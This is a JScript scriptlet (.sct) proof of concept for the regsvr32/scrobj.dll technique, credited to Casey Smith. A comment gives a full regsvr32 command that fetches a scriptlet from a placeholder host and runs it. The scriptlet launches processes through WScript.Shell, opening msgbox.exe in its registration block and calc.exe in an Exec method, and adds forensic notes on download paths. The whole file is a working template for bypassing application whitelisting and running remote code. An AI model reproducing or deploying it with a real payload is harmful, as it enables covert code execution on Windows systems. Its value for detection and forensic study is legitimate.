<?XML version="1.0"?><scriptlet><registration description="Bandit"

1. <?XML version="1.0"?>
2. <scriptlet>
3.  
4. <registration
5. description="Bandit"
6. progid="Bandit"
7. version="1.00"
8. classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9. >
10.  
11. <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
12. <!-- DFIR -->
13. <!-- .sct files are downloaded and executed from a path like this -->
14. <!-- Though, the name and extension are arbitary.. -->
15. <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
16. <!-- Based on current research, no registry keys are written, since call "uninstall" -->
17.  
18.  
19. <!-- Proof Of Concept - Casey Smith @subTee -->
20. <script language="JScript">
21. <![CDATA[
22.  
23. var r = new ActiveXObject("WScript.Shell").Run("msgbox.exe");
24.  
25. ]]>
26. </script>
27. </registration>
28.  
29. <public>
30. <method name="Exec"></method>
31. </public>
32. <script language="JScript">
33. <![CDATA[
34.  
35. function Exec()
36. {
37. var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
38. }
39.  
40. ]]>
41. </script>
42.  
43. </scriptlet>